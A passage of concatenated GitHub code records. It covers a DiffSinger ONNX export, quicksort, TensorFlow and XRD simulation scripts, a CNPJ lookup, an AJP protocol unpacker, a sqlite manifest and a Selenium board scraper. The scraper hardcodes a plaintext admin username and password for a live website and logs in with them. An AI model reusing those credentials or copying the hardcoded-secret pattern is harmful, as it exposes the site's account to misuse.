onnxsim.simplify(model, include_subgraph=True)\n assert check, 'Simplified ONNX model could not be validated'\n\n onnx.save(model, target)\n print('Graph fixed and optimized.')\n\n\ndef export(model_path):\n set_hparams(print_hparams=False)\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n decoder = DiffDecoder(device)\n n_frames = 10\n\n with torch.no_grad():\n shape = (1, 1, hparams['audio_num_mel_bins'], n_frames)\n noise_t = torch.randn(shape, device=device)\n noise_list = torch.randn((3, *shape), device=device)\n condition = torch.rand((1, hparams['hidden_size'], n_frames), device=device)\n step = (torch.rand((), device=device) * hparams['K_step']).long()\n speedup = (torch.rand((), device=device) * step / 10.).long()\n step_prev = torch.maximum(step - speedup, torch.tensor(0, dtype=torch.long, device=device))\n\n print('Tracing modules...')\n decoder.model.denoise_fn = torch.jit.trace(\n decoder.model.denoise_fn,\n (\n noise_t,\n step,\n condition\n )\n )\n decoder.model.naive_noise_predictor = torch.jit.trace(\n decoder.model.naive_noise_predictor,\n (\n noise_t,\n noise_t,\n step\n ),\n check_trace=False\n )\n decoder.model.plms_noise_predictor = torch.jit.trace_module(\n decoder.model.plms_noise_predictor,\n {\n 'forward': (\n noise_t,\n noise_t,\n step,\n step_prev\n ),\n 'predict_stage0': (\n noise_t,\n noise_t\n ),\n 'predict_stage1': (\n noise_t,\n noise_list\n ),\n 'predict_stage2': (\n noise_t,\n noise_list\n ),\n 'predict_stage3': (\n noise_t,\n noise_list\n ),\n }\n )\n decoder.model.mel_extractor = torch.jit.trace(\n decoder.model.mel_extractor,\n (\n noise_t\n )\n )\n\n decoder = torch.jit.script(decoder)\n condition = torch.rand((1, n_frames, hparams['hidden_size']), device=device)\n speedup = torch.tensor(10, dtype=torch.long, device=device)\n dummy = decoder.forward(condition, speedup)\n\n torch.onnx.export(\n decoder,\n (\n condition,\n speedup\n ),\n model_path,\n input_names=[\n 'condition',\n 'speedup'\n ],\n output_names=[\n 'mel'\n ],\n dynamic_axes={\n 'condition': {\n 1: 'n_frames'\n }\n },\n opset_version=11,\n example_outputs=(\n dummy\n )\n )\n print('PyTorch ONNX export finished.')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Export diffusion decoder to ONNX')\n parser.add_argument('--exp', type=str, required=True, help='Experiment to export')\n parser.add_argument('--target', required=False, type=str, help='Path of the target ONNX model')\n args = parser.parse_args()\n\n cwd = os.getcwd()\n if args.target:\n target = os.path.join(cwd, args.target)\n else:\n target = None\n os.chdir(root_dir)\n exp = args.exp\n sys.argv = [\n 'inference/ds_cascade.py',\n '--config',\n f'checkpoints/{exp}/config.yaml',\n '--exp_name',\n exp\n ]\n\n path = f'onnx/assets/{exp}.onnx' if not target else target\n export(path)\n fix(path, path)\n\n os.chdir(cwd)\n if args.target:\n log_path = os.path.abspath(args.target)\n else:\n log_path = path\n print(f'| export \\'model\\' to \\'{log_path}\\'.')\n","repo_name":"kongjian123/DiffSinger","sub_path":"onnx/export/export_diff_decoder.py","file_name":"export_diff_decoder.py","file_ext":"py","file_size_in_byte":36468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"40662857949","text":"def qsort(a, start, end):\n \"\"\" quicksort in O(nlogn), no extra memory, in-place\"\"\"\n if start < end:\n p = choosepivot(start, end)\n if p != start:\n a[p], a[start] = a[start], a[p]\n equal = partition(a, start, end)\n qsort(a, start, equal-1)\n qsort(a, equal+1, end)\ndef partition(a, l, r):\n pivot, i = a[l], l+1\n for j in range(l+1, r+1):\n if a[j] <= pivot:\n a[i],a[j] = a[j],a[i]\n i += 1\n # swap pivot to its correct place\n a[l], a[i-1] = a[i-1], a[l]\n return i-1\ndef choosepivot(s, e):\n return randint(s,e)","repo_name":"bdlm-dev/Competitive-Programming-Codebook","sub_path":"content/flow/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"71570507848","text":"import numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\nX = tf.constant([2013, 2014, 2015, 2016, 2017])\nY = tf.constant([12000, 14000, 15000, 16500, 17500])\n\ndataset = tf.data.Dataset.from_tensor_slices((X, Y))\n\nfor x, y in dataset:\n print(x.numpy(), y.numpy())\n\n(trainData, trainLabel), (_, _) = tf.keras.datasets.mnist.load_data()\n\ntrainData = np.expand_dims(trainData.astype(np.float32) / 255.0, axis=-1)\nmnist_dataset = tf.data.Dataset.from_tensor_slices((trainData, trainLabel))\n\nfor image, label in mnist_dataset:\n plt.title(label.numpy())\n plt.imshow(image.numpy()[:, :, 0])\n plt.show()\n break\n\n\n# Map\ndef rot90(ima, lab):\n ima = tf.image.rot90(ima)\n return ima, lab\n\n\nmnist_dataset = mnist_dataset.map(rot90)\n\n# Shuffle\n\n# Batch\nmnist_dataset = mnist_dataset.batch(4)\nfor images, labels in mnist_dataset:\n fig, axs = plt.subplots(1, 4)\n for i in range(4):\n axs[i].set_title(labels.numpy()[i])\n axs[i].imshow(images.numpy()[i, :, :, 0])\n plt.show()\n break;\n\n# Repeat\n\n# Reduce\n\n# Take\n","repo_name":"xin-pu/TFLearning","sub_path":"BasciTF/Data/DataSet.py","file_name":"DataSet.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2887688104","text":"#!/usr/bin/env python3\nfrom __future__ import absolute_import, division, print_function\nimport iotbx.pdb\nimport iotbx.mrcfile\nfrom scitbx.array_family import flex\nfrom cctbx.development import random_structure\nfrom cctbx import sgtbx\nfrom cctbx import maptbx\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom random import randrange\nfrom multiprocessing import Pool\nimport time\nfrom scipy.stats import truncnorm\n\nimport matplotlib.pyplot as plt\n\nnp.random.seed(5)\n\nlambd = 1.540596\n\ndef fwhm(peak, lh = 10*0.437, Lam = 1.540596):\n Rad2 = 360 / np.pi\n return lh / 10**3 / Lam * np.tan(peak / Rad2) * Rad2\n\ndef LP_Factor(Th2, CeV = 0):\n Deg = np.pi / 180\n A = np.cos(CeV*Deg)**2\n return (1 + A * np.cos(Th2*Deg) ** 2) / (1 + A) / np.sin(Th2*Deg)\n\ndef lorenz(Th2, peak, peak_i):\n return (2 / np.pi / fwhm(peak_i)) / (1 + 4 * (Th2 - peak)**2 / fwhm(peak_i)**2)\n\ndef h(phi, peak):\n return L*np.sqrt(np.cos(phi*np.pi/180)**2/np.cos(peak*np.pi/180)**2 - 1)\ndef phi_min(peak):\n return 180/np.pi*np.arccos(np.cos(peak*np.pi/180)*np.sqrt( ((H+S)/L)**2 + 1 ))\ndef phi_infl(peak):\n return 180/np.pi*np.arccos(np.cos(peak*np.pi/180)*np.sqrt( ((H-S)/L)**2 + 1 ))\ndef W(phi, peak):\n if phi < phi_min(peak):\n return 0\n if phi_min(peak) <= phi <= phi_infl(peak):\n return H + S - h(phi, peak)\n if phi_infl(peak) <= phi <= peak:\n return 2*min(H, S)\n if phi > peak:\n return 0\n\ndef W2(phis, peak):\n result = np.zeros(len(phis))\n cond1 = (phi_min(peak) <= phis) & (phis <= phi_infl(peak))\n result[cond1] = H + S - h(phis[cond1], peak)\n cond2 = (phis > phi_infl(peak)) & (phis <= peak)\n result[cond2] = 2 * min(H, S)\n return result\n\ndef pool_peaks(peak_i):\n peak = theta_peaks[peak_i]\n a, b = np.where(peak - 3 <= theta2)[0][0], np.where(theta2 <= peak + 3)[0][-1]\n peak_index = np.where(theta2 <= peak)[0][-1]\n #tmp = tmp / np.sum(tmp) / step * factors[peak_i]\n if peak < 10:\n N_gauss = 20\n elif peak < 30:\n N_gauss = 14\n elif peak < 70:\n N_gauss = 7\n else:\n N_gauss = 4\n xn, wn = np.polynomial.legendre.leggauss(N_gauss)\n deltan = (peak+phi_min(peak))/2 + (peak-phi_min(peak))*xn/2\n tmp_assy = np.zeros(len(theta2[a:b]))\n i = 0\n for phi in theta2[a:b]:\n # print(deltan)\n if phi == theta2[peak_index]:\n xn, wn = np.polynomial.legendre.leggauss(20)\n deltan = (peak+phi_min(peak))/2 + (peak-phi_min(peak))*xn/2\n sum1 = np.sum(wn*W2(deltan, peak)*lorenz(phi, deltan, peak)/h(deltan, peak)/np.cos(deltan*np.pi/180))\n sum2 = np.sum(wn*W2(deltan, peak)/h(deltan, peak)/np.cos(deltan*np.pi/180))\n tmp_assy[i] = sum1/sum2\n i = i+1\n tmp_assy = tmp_assy / np.sum(tmp_assy) / step * factors[peak_i]\n #y += y_tmp\n #print(y)\n return (a, b, tmp_assy)\n\ndef pool_peaks2(peak_i):\n peak = theta_peaks[peak_i]\n a, b = np.where(peak - 3 <= theta2)[0][0], np.where(theta2 <= peak + 3)[0][-1]\n peak_index = np.where(theta2 <= peak)[0][-1]\n #tmp = tmp / np.sum(tmp) / step * factors[peak_i]\n if peak < 10:\n N_gauss = 30\n elif peak < 30:\n N_gauss = 20\n elif peak < 70:\n N_gauss = 20\n else:\n N_gauss = 20\n xn, wn = np.polynomial.legendre.leggauss(N_gauss)\n deltan = (peak+phi_min(peak))/2 + (peak-phi_min(peak))*xn/2\n tmp_assy = np.zeros(len(theta2[a:b]))\n i = 0\n sum2 = np.sum(wn*W2(deltan, peak)/h(deltan, peak)/np.cos(deltan*np.pi/180))\n arr1 = wn*W2(deltan, peak)/h(deltan, peak)/np.cos(deltan*np.pi/180)\n for phi in theta2[a:b]:\n # print(deltan)\n sum1 = np.sum(arr1 * lorenz(phi, deltan, peak))\n tmp_assy[i] = sum1/sum2\n i = i+1\n tmp_assy = tmp_assy / np.sum(tmp_assy) / step * factors[peak_i]\n #y += y_tmp\n #print(y)\n return (a, b, tmp_assy)\n #y_none[a:b] += tmp\n\n\ndef truncated_normal(mean, stddev, minval, maxval, n):\n a, b = (minval - mean) / stddev, (maxval - mean) / stddev\n r = truncnorm(a,b, loc = mean, scale = stddev)\n return(r.rvs(n))\n\n\ndef dmin (angle = 90):\n return lambd / np.sin(angle/180*np.pi) / 2\n\ndef XRS(groups, cell, elemental):\n xrs = random_structure.xray_structure(\n space_group_info = sgtbx.space_group_info(groups),\n elements = elemental,\n unit_cell = cell)\n a = xrs.structure_factors(d_min= dmin()).f_calc().sort()\n I = a.as_intensity_array().data().as_numpy_array()\n m = a.multiplicities().data().as_numpy_array()\n for i in range(len(m)):\n I[i] *= m[i]\n Ind = list(a.indices())\n D = a.d_spacings().data().as_numpy_array()\n T2 = a.two_theta(lambd, deg = True).data().as_numpy_array()\n return I, Ind, D, T2\n\n\nif __name__ == '__main__':\n N = 3 #number of pictures\n\n cell_a = truncated_normal(10.05493, 2.792331, 2, 10000, N)\n cell_b = truncated_normal(12.18931, 3.201324, 2, 10000, N)\n cell_c = truncated_normal(15.10612, 4.623489, 2, 10000, N)\n angle_a = truncated_normal(90, 13.83713, 40, 140, N)\n angle_b = truncated_normal(90, 11.86436, 40, 140, N)\n angle_c = truncated_normal(90, 14.70701, 40, 140, N)\n\n\n\n #setting parameters for assymetry\n L, H, S = 720, 7.5, 10.7\n cells = list(zip(cell_a, cell_b, cell_c, angle_a, angle_b, angle_c))\n groups = \"P-1\" #setting for groups\n elemental = [[\"C\"]*randrange(6, 15) for i in range(N)] #setting for elemets\n for i in range(N):\n factors, index, d_s, theta_peaks = XRS(groups, cells[i], elemental[i])\n theta2 = np.arange(1, 90, 0.005)\n theta_peaks = theta_peaks[theta_peaks < 89] # берем только нужные пики\n #print(range(len(theta_peaks)))\n step = theta2[1] - theta2[0]\n y = np.zeros(len(theta2))\n #y_none = np.zeros(len(theta2))\n\n with Pool(processes = 8) as p:\n z = p.map(pool_peaks2, range(len(theta_peaks))) #ассиметрия пиков\n #print(z)\n for j in z:\n y[j[0]:j[1]] += j[2]\n #print(y_end)\n #y.wait()\n y = np.multiply(y, LP_Factor(theta2))\n #print(y_end)\n #y_none = np.multiply(y_none, LP_Factor(theta2))\n coeffs = np.random.normal(loc = 0, scale = 1, size = 14)\n xx = np.linspace(-1, 1, len(theta2))\n yy = np.polynomial.chebyshev.chebval(xx, coeffs)\n a, b = 0.2, 90\n x1, x2 = -1, 1 #background\n xx = (a - b)/(x1 - x2)*xx + (b*x1-a*x2)/(x1-x2)\n a, b = 0, 25000\n y1, y2 = np.min(yy), np.max(yy)\n yy = (a - b)/(y1 - y2)*yy + (b*y1-a*y2)/(y1-y2)\n y += yy\n #y_none += yy\n file = open('./cryst_edit'+str(i)+'.txt', 'w')\n for j in range(0, len(theta2), 1):\n file.write(str(theta2[j])+ ' ' + str(y[j]))\n file.write('\\n')\n file.close()\n","repo_name":"blackwood168/random_diffraction","sub_path":"random_proga_pool_edit.py","file_name":"random_proga_pool_edit.py","file_ext":"py","file_size_in_byte":6851,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"19910228869","text":"import requests\nimport json\nimport time\nimport pandas\n\ndef importar_csv(endereco):\n tabela = pandas.read_excel(endereco)\n total_cnpj = []\n for linha in tabela['cnpj']:\n total_cnpj.append(str(linha).rjust(14, '0'))\n return total_cnpj\n\ndef cria_arquivo(endereco):\n # Criar um arquivo\n arquivo = open(endereco, 'w')\n #arquivo.write(texto)\n arquivo.close()\n\ndef atualizar_arquivo(endereco, lista):\n arquivo = open(endereco, 'a')\n for i in range(len(lista)):\n valor = lista[i]\n arquivo.write(valor + ',')\n arquivo.write('\\n')\n #print(lista)\n arquivo.close()\n\ndef ler_arquivo(endereco):\n arquivo = open(endereco, 'r')\n texto = arquivo.read()\n print(texto)\n\n#Consulta limitada a 3 CNPJs por minuto\n#https://www.sintegraws.com.br/api/documentacao-api-receita-federal.php\ndef api_cnpj(lista_cnpj, loop):\n lista_dados = []\n for cnpj in lista_cnpj:\n url = f\"https://receitaws.com.br/v1/cnpj/{cnpj}\"\n querystring = {\"token\":\"XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\",\"cnpj\":\"06990590000123\",\"plugin\":\"RF\"}\n try:\n consulta = requests.request(\"GET\", url, params=querystring)\n dado = json.loads(consulta.text)\n # API acessada com sucesso.\n ativ1 = dado['atividade_principal']\n cnae_cod1 = ativ1[0]['code'].replace(\",\",\";\")\n cnae_text1 = ativ1[0]['text'].replace(\",\",\";\")\n cont = 0\n ativ2 = dado['atividades_secundarias']\n while cont < len(ativ2):\n if cont == 0:\n cnae_cod2 = ativ2[cont]['code'].replace(\",\",\";\")\n cnae_text2 = ativ2[cont]['text'].replace(\",\",\";\")\n else:\n cnae_cod2 = cnae_cod2 + ',' + ativ2[cont]['code'].replace(\",\",\";\")\n cnae_text2 = cnae_text2 + ',' + ativ2[cont]['text'].replace(\",\",\";\")\n cont = cont + 1\n\n lista_dados.append(\n [\n dado['cnpj'],\n dado['nome'],\n # dado['numero'],\n # dado['complemento'],\n dado['cep'],\n # dado['bairro'],\n dado['municipio'],\n dado['uf'],\n # dado['email'],\n # dado['telefone']\n #cnae_cod1,\n #cnae_text1,\n #cnae_cod2,\n #cnae_text2\n ]\n )\n except Exception as erro:\n lista_dados.append(\n [\n 'erro',\n 'erro',\n 'erro',\n 'erro',\n 'erro',\n 'erro'\n ]\n )\n #Pausa no cod devido limite de consulta de 3 CNPJs por min\n if loop >3:\n time.sleep(70)\n\n return lista_dados\n\ndiretorio = 'C:/Users/andremt/OneDrive - Votorantim/Documentos/Python/'\n\n#Buscar xlsx com os CNPJs\nnome_arquivo = 'Lista_CNPJ.xlsx'\nendereco = diretorio + nome_arquivo\ntotal_cnpj = importar_csv(endereco)\n\n#Arquivo que retornará valores da consulta\nnome_arquivo = 'CNPJs.txt'\nendereco = diretorio + nome_arquivo\ncria_arquivo(endereco)\n\nlista_cnpj = []\ni=0\n\nwhile i <= len(total_cnpj):\n lista_cnpj = total_cnpj[i:i+3]\n i += 3\n print(lista_cnpj)\n lista_dados = api_cnpj(lista_cnpj, len(total_cnpj))\n j=0\n for j in range(len(lista_dados)):\n atualizar_arquivo(endereco, lista_dados[j])","repo_name":"AndreTsuji/estudo-python","sub_path":"api_cnpj.py","file_name":"api_cnpj.py","file_ext":"py","file_size_in_byte":3517,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"6817600749","text":"#! /usr/bin/python3\n\nimport json\nimport sys\n\nwith open(\"cgminer.conf\", \"w\") as file:\n try:\n cgminerconf = json.load(sys.stdin)\n except:\n file.close()\n exit(1)\n file.write(json.dumps(cgminerconf, indent=4, separators=(',', ':'), sort_keys=True))\n file.close()\n\n","repo_name":"arijan/cgmrrd","sub_path":"putconf.py","file_name":"putconf.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"71134794248","text":"from random import randint, shuffle, seed\r\n\r\n\r\ndef partition(T, p, r):\r\n T[p], T[r] = T[r], T[p]\r\n x = T[r]\r\n i = p-1\r\n for j in range(p, r):\r\n if T[j] < x:\r\n i += 1\r\n T[i], T[j] = T[j], T[i]\r\n T[r], T[i+1] = T[i+1], T[r]\r\n return i+1\r\n\r\n\r\ndef median_of_five(T, p, r, step):\r\n for i in range(r, p, -step):\r\n for j in range(p, i, step):\r\n if T[j] > T[j+step]:\r\n T[j], T[j+step] = T[j+step], T[j]\r\n tmp = p+step*(((r-p)//step)//2)\r\n T[p], T[tmp] = T[tmp], T[p]\r\n\r\n\r\ndef select(T, p, r):\r\n step = 1\r\n while r-p >= step:\r\n for i in range(p, r, 5*step):\r\n median_of_five(T, i, min(i+5*step-1, r), step)\r\n step *= 5\r\n r = r-r % (step)\r\n\r\n\r\ndef linearselect(T, k):\r\n p = 0\r\n r = len(T)-1\r\n while True:\r\n select(T, p, r)\r\n q = partition(T, p, r)\r\n if q == k:\r\n return T[q]\r\n elif k < q:\r\n r = q-1\r\n else:\r\n p = q+1\r\n\r\n\r\nseed(42)\r\n\r\nn = 11\r\nfor i in range(n):\r\n A = list(range(n))\r\n shuffle(A)\r\n print(A)\r\n x = linearselect(A, i)\r\n if x != i:\r\n print(\"Blad podczas wyszukiwania liczby\", i)\r\n exit(0)\r\n\r\nprint(\"OK\")\r\n","repo_name":"BlazejNowicki/ASD","sub_path":"offline/zad3.py","file_name":"zad3.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"23126656402","text":"from bayserver_core.bay_log import BayLog\nfrom bayserver_core.sink import Sink\nfrom bayserver_core.protocol.command_unpacker import CommandUnPacker\n\nfrom bayserver_docker_ajp.ajp_type import AjpType\nfrom bayserver_docker_ajp.command.cmd_data import CmdData\nfrom bayserver_docker_ajp.command.cmd_end_response import CmdEndResponse\nfrom bayserver_docker_ajp.command.cmd_forward_request import CmdForwardRequest\nfrom bayserver_docker_ajp.command.cmd_get_body_chunk import CmdGetBodyChunk\nfrom bayserver_docker_ajp.command.cmd_send_body_chunk import CmdSendBodyChunk\nfrom bayserver_docker_ajp.command.cmd_send_headers import CmdSendHeaders\nfrom bayserver_docker_ajp.command.cmd_shutdown import CmdShutdown\n\nclass AjpCommandUnPacker(CommandUnPacker):\n\n def __init__(self, handler):\n self.cmd_handler = handler\n self.reset()\n\n def reset(self):\n pass\n\n def packet_received(self, pkt):\n\n BayLog.debug(\"ajp: packet received: type=%d data len=%d\", pkt.type, pkt.data_len())\n\n if pkt.type == AjpType.DATA:\n cmd = CmdData()\n\n elif pkt.type == AjpType.FORWARD_REQUEST:\n cmd = CmdForwardRequest()\n\n elif pkt.type == AjpType.SEND_BODY_CHUNK:\n cmd = CmdSendBodyChunk(pkt.buf, pkt.header_len, pkt.data_len)\n\n elif pkt.type == AjpType.SEND_HEADERS:\n cmd = CmdSendHeaders()\n\n elif pkt.type == AjpType.END_RESPONSE:\n cmd = CmdEndResponse()\n\n elif pkt.type == AjpType.SHUTDOWN:\n cmd = CmdShutdown()\n\n elif pkt.type == AjpType.GET_BODY_CHUNK:\n cmd = CmdGetBodyChunk()\n\n else:\n raise Sink()\n\n cmd.unpack(pkt)\n return cmd.handle(self.cmd_handler) # visit\n\n def need_data(self):\n return self.cmd_handler.need_data()\n","repo_name":"baykit/BayServer_Python","sub_path":"packages/bayserver-docker-ajp/bayserver_docker_ajp/ajp_command_unpacker.py","file_name":"ajp_command_unpacker.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36173358057","text":"# Átváltás római számról arab számra\r\n\r\n# Római számjegyek\r\nromai = {'I':1,\r\n 'V':5,\r\n 'X':10,\r\n 'L':50,\r\n 'C':100,\r\n 'D':500,\r\n 'M':1000}\r\n\r\nwhile True:\r\n # Beolvasás\r\n be = input('Római szám: ').upper()\r\n if be == '':\r\n break\r\n # Számjegyek értéke\r\n \r\n # számjegyek előjele\r\n \r\n # Összegzés és kiírás\r\n \r\n","repo_name":"radamhu/prog101","sub_path":"python101/python2/16 Szótárak 1/Források/romai.py","file_name":"romai.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36713052941","text":"class LinkedList:\n def __init__(self):\n \"\"\"Initializes an empty linked list with a null head\"\"\"\n self.head = None\n\n def kth_from_end(self, k):\n \"\"\"\n Takes an integer k as input and returns the value of the node that is k places from the tail of the linked list.\n\n Args:\n k (int): The index of the node from the tail of the linked list.\n\n Returns:\n int: The value of the node that is k places from the tail of the linked list.\n\n Raises:\n ValueError: If k is less than 0 or greater than the length of the linked list.\n \"\"\"\n if k < 0:\n raise ValueError(\"k must be a positive integer\")\n\n p1 = self.head\n p2 = self.head\n\n for i in range(k):\n if p1 is None:\n raise ValueError(\"k is greater than the length of the linked list\")\n p1 = p1.next\n\n if p1 is None:\n return self.head.value\n\n while p1.next is not None:\n p1 = p1.next\n p2 = p2.next\n\n return p2.value\n\n def find_middle(self):\n \"\"\"\n Returns the value of the node at the middle of the linked list.\n\n Returns:\n int: The value of the node at the middle of the linked list.\n\n \"\"\"\n if self.head is None:\n return None\n\n p1 = self.head\n p2 = self.head\n\n while p1 is not None and p1.next is not None:\n p1 = p1.next.next\n p2 = p2.next\n\n return p2.value\n","repo_name":"mohammadalsmadi2000/data-structures-and-algorithms","sub_path":"linked-list-kth/linked-list-kth/linked-list-kth.py","file_name":"linked-list-kth.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"6977416249","text":"#!/usr/bin/env python3.6\n# -*- coding: utf-8 -*-\n\nimport os\nimport stdlib\nfrom stdlib.template.configure import configure\nfrom stdlib.template import autotools\nfrom stdlib.manifest import manifest\n\n\n@manifest(\n name='sqlite',\n category='dev-libs',\n description='''\n A C library that implements a self-contained, serverless, zero-configuration, transactional SQL database engine.\n ''',\n tags=['sql', 'db'],\n maintainer='grange_c@raven-os.org',\n licenses=[stdlib.license.License.PUBLIC_DOMAIN],\n upstream_url='https://www.sqlite.org/',\n kind=stdlib.kind.Kind.EFFECTIVE,\n versions_data=[\n {\n 'semver': '3.30.1',\n 'fetch': [{\n 'url': 'https://sqlite.org/2019/sqlite-autoconf-3300100.tar.gz',\n 'sha256': '8c5a50db089bd2a1b08dbc5b00d2027602ca7ff238ba7658fabca454d4298e60',\n }],\n },\n ],\n)\ndef build(build):\n os.environ['CFLAGS'] += '''\\\n -DSQLITE_ENABLE_FTS3=1 \\\n -DSQLITE_ENABLE_FTS4=1 \\\n -DSQLITE_ENABLE_COLUMN_METADATA=1 \\\n -DSQLITE_ENABLE_UNLOCK_NOTIFY=1 \\\n -DSQLITE_ENABLE_DBSTAT_VTAB=1 \\\n -DSQLITE_SECURE_DELETE=1 \\\n -DSQLITE_ENABLE_FTS3_TOKENIZER=1\\\n '''\n\n return autotools.build(\n configure=lambda: configure(\n '--enable-fts5',\n )\n )\n","repo_name":"raven-os/nbuild-manifests","sub_path":"dev-libs/sqlite.py","file_name":"sqlite.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"45120930295","text":"import requests, xmltodict, json\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nfrom urllib import parse\r\nimport datetime as dt\r\nimport urllib3\r\nimport traceback\r\nimport os\r\nimport openpyxl\r\nfrom bs4 import BeautifulSoup\r\nfrom urllib.parse import urljoin\r\nfrom selenium import webdriver\r\n\r\n#공지사항에 쓰임 목적에따라 달라질 수 있음\r\nfrom selenium.common import UnexpectedAlertPresentException\r\n\r\n\r\ndef void(): #main 격의 자리이며 그외 함수는 이 위에 def로 지정\r\n while True:\r\n try:\r\n print(\"hello\")\r\n c = input(\"종료하려면 x를 누르세요 : \")\r\n if c == 'x':\r\n break\r\n time.sleep(1)\r\n\r\n ### 로그인 창 ###\r\n\r\n USER=\"admin\"\r\n PW=\"adminadmin\"\r\n\r\n urls = 'https://www.costac.co.kr/bbs/login.php'\r\n driver = webdriver.Chrome('C:/Users/skflc/PycharmProjects/pythonProject/chromedriver_win32/chromedriver.exe')\r\n driver.get(urls)\r\n\r\n driver.find_element_by_id('login_id').send_keys('admin')\r\n driver.find_element_by_id('login_pw').send_keys('adminadmin')\r\n driver.find_element_by_css_selector('#login_fs > input.btn_submit').click()\r\n\r\n aaa = input(\"종료하려면 x를 누르세요 : \")\r\n if aaa == 'x':\r\n break\r\n #이상 로그인 및 테스트구역\r\n mCols = []\r\n df = pd.DataFrame(columns=mCols)\r\n excel_file = openpyxl.Workbook()\r\n excel_sheet = excel_file.active\r\n excel_sheet.title = '테스트'\r\n excel_sheet.append(['이', '액셀은', '역순으로', '작성', '되었음', '22-06-20']) # 정순처리시 주석\r\n excel_sheet.append(['번호', '제목', '내용(selectone)', '내용(select)', '작성자', '작성시각'])\r\n dir = 'C:\\\\Users\\\\skflc\\\\Desktop\\\\test0615\\\\testS0624Fin.xlsx'\r\n btitles = []\r\n brticles = []\r\n brticles2 = []\r\n buths = []\r\n btimes = []\r\n\r\n j = 1 # 글번호\r\n\r\n # 여기서 부터 반복문\r\n for i in range(820, 3, -1): #정순은 4,813\r\n try:\r\n jj = str(j)\r\n ii = str(i)\r\n url = 'https://www.costac.co.kr/bbs/board.php?bo_table=form_service&wr_id=' + ii\r\n #url = 'https://www.costac.co.kr/bbs/board.php?bo_table=sim_report&wr_id=' + ii\r\n print(url)\r\n # source = requests.get(url, verify=False)\r\n source = driver.get(url)\r\n\r\n # 분기점 source.status_code\r\n\r\n # html = source.text\r\n html = driver.page_source\r\n soap = BeautifulSoup(html, 'html.parser')\r\n article = soap.select_one('#bo_v_con')\r\n article2 = soap.select('#bo_v_con')\r\n title = soap.select_one('#bo_v_title') # 제목\r\n auth = soap.select_one('#bo_v_info > ul > li:nth-child(1) > strong > span') # 작성자\r\n wtime = soap.select_one('#bo_v_info > ul > li:nth-child(2) > strong') # 작성시각\r\n\r\n #제목 작성자, 작성시각은 gettext를 들어감\r\n # form_result > table\r\n # form_result > div:nth-child(2) > table.table1\r\n # form_result > div:nth-child(4) > table\r\n # form_result > div:nth-child(2) > table.gunmul\r\n # table/table1,gunmul,table3,gdTable\r\n # content > section > article > form > div > table:nth-child(1)\r\n\r\n\r\n\r\n # time.sleep(1)\r\n\r\n ## print(soap)\r\n # print('-----------------------------')\r\n # print(article)\r\n # print('-----------------------------')\r\n ## print(article.get_text())\r\n brticle = str(article)\r\n brticle2 = str(article2)\r\n crticle = article.text\r\n drticle = article.string\r\n\r\n\r\n\r\n #btitle = str(title)\r\n #buth = str(auth)\r\n #btime = str(wtime)\r\n btitle = title.get_text()\r\n buth = auth.get_text()\r\n btime = wtime.get_text()\r\n btime = '20'+btime+' 00:00:'+str(i//180)+str(i%10)\r\n #print(btime)\r\n\r\n #time.sleep(20)\r\n excel_sheet.append([jj, btitle, brticle, brticle2, buth, btime])\r\n btitles.append(btitle)\r\n brticles.append(brticle)\r\n brticles2.append(brticle2)\r\n buths.append(buth)\r\n btimes.append(btime)\r\n\r\n #excel_sheet.append(['공백'])\r\n print('-----------'+jj + '번째 실행------------------------------------------------------------------------------------------------------------------------')\r\n print(brticle + \" \" + brticle2 + \" \" + buth + \" \" + btime + \" \" + btitle)\r\n j = j + 1\r\n\r\n # time.sleep(2) # 원인이 시간이 이유라면? 아니다 다만\r\n\r\n #eee = input(\"종료하려면 x를 누르세요 : \")\r\n\r\n #if eee == 'x':\r\n #break\r\n except UnexpectedAlertPresentException as UAPE:\r\n print(UAPE)\r\n print(\"일시적인 오류이거나 글이 존재하지 않습니다.\")\r\n print(url)\r\n time.sleep(1)\r\n excel_sheet.append(['오류'])\r\n continue\r\n # pass\r\n\r\n ## source = requests.get(url, verify=False)\r\n\r\n ## article = soap2.select_one('#bo_v_con')\r\n ## article2 = soap2.select_one('#bo_v_atc')\r\n\r\n\r\n\r\n\r\n time.sleep(1)\r\n # 글내용 bo_v_con\r\n\r\n excel_file.save(dir)\r\n df['btitle'] = btitles\r\n df['brticle'] = brticles\r\n df['brticle2'] = brticles2\r\n df['buth'] = buths\r\n df['btime'] = btimes\r\n df.to_excel('C:/Users/skflc/Desktop/' + ' 0624finS2.xlsx')\r\n\r\n\r\n time.sleep(1)\r\n print(\"액셀파일 생성이완료됨\")\r\n d = input(\"종료하려면 x를 누르세요 : \")\r\n if d == 'x':\r\n break\r\n\r\n except Exception as e:\r\n print(e)\r\n print(traceback.format_exc())\r\n print('예기치 못한 오류가 